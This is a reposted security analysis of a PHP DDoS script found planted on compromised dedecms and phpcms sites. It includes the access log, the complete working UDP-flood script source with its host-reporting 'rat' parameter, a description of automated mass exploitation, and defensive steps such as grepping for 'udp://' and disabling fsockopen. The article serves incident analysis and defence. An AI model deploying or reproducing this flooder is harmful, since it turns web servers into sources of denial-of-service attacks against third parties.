Malicious DDoS Script Log Analysis Report

Source: Internet
Author: User
Tags: sql injection, attack, website, server

Editor's note from www.2cto.com: this site has spent a lot of time studying the phpddos problem and has published some research results. However, no perfect solution has been found; this includes the conventional method given in this article, which seriously affects website programs, especially dz (Discuz!) and content-collection scripts.

There has been a lot of feedback from websites recently: an IP address keeps requesting a single script file on the site (in this example, diy.php), and the site then generates a large number of requests towards other websites. After the security team contacted the user, the access log and the script source were obtained as follows.
Access log:
199.36.74.138 - - [29/Jul/2012:00:48:00 +0800] "GET /include/diy.php?host=76.10.221.209&port=6005&time=60 HTTP/1.1" 200 1371
PHP DDoS script:
<?php
set_time_limit(999999);
// Target and duration are taken straight from the query string.
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {
    // With a 'rat' parameter and no target, the script reports the host it runs on.
    if (StrLen($_GET['rat']) <> 0) {
        echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . gethostbyname($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_SOFTWARE'] . $_GET['rat'];
        exit;
    }
    echo "Parameters can not be empty!";
    exit;
}
// Build the payload by concatenating the string 65535 times.
for ($i = 0; $i < $Sendlen; $i++) {
    $out .= "";
}
$max_time = time() + $exec_time;
echo "maximum attack time:" . $max_time . "\n";
echo "target IP Address:" . $host . "\n";
echo "attack Port:" . $port . "\n";
// Send UDP packets to the target until the time limit expires.
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
echo "Send Host: $host:$port\n\n";
echo "Send Flow: $packets * ($Sendlen/1024 = " . round($Sendlen/1024, 2) . ") kb/1024 = " . round($packets * $Sendlen/1024/1024, 2) . "mb\n\n";
echo "Send Rate :" . round($packets/$exec_time, 2) . "packs/s ;" . round($packets/$exec_time * $Sendlen/1024/1024, 2) . "mb/s ";
?>
The script reads the host, port and time parameters from the GET request and sets the packet size to 65535. It builds the payload by concatenating 65535 copies of the string "", then calls fsockopen("udp://$host", $port, $errno, $errstr, 5) in a loop so that packets are sent over UDP to the target host and port until the time limit expires. The compromised web server thus becomes the source of a DoS attack, which consumes a large amount of the site's traffic and occupies its bandwidth, so the site itself may no longer be reachable.
In testing, the script sends on average more than 40W (400,000) packets per minute, which is highly damaging to normal website services. Statistics on the web applications of sites hit by this malicious DDoS script show that most run dedecms or phpcms, which may be related to earlier vulnerabilities in those CMSs.
This type of attack resembles the mass SQL injection attacks that have been prevalent in recent years: a known web application vulnerability (such as SQL injection) is combined with a search engine to find large numbers of sites carrying that vulnerability, giving a fully automated attack process:
1. A web application vulnerability is discovered.
2. Search engines are used to find websites with the vulnerability (sites running that web application).
3. All the websites found are attacked in batch by a crawler.
4. Malicious files are uploaded in batch.
5. DoS attacks are launched in batch.
6. The attacker's master server monitors and maintains the list of attacked websites.
Through these steps, attackers can easily carry out large-scale attacks that are targeted, batched and automated.
Solutions for malicious DoS script attacks:
1. Check whether any file on the website calls the fsockopen function maliciously, or grep all website files for the "udp://" keyword, to find out whether a malicious DoS script has been planted.
2. Edit php.ini and add fsockopen to disable_functions so that the function is disabled (see the editor's note above: this breaks programs that rely on fsockopen).
3. Install the latest security patches for the open-source website applications in use.
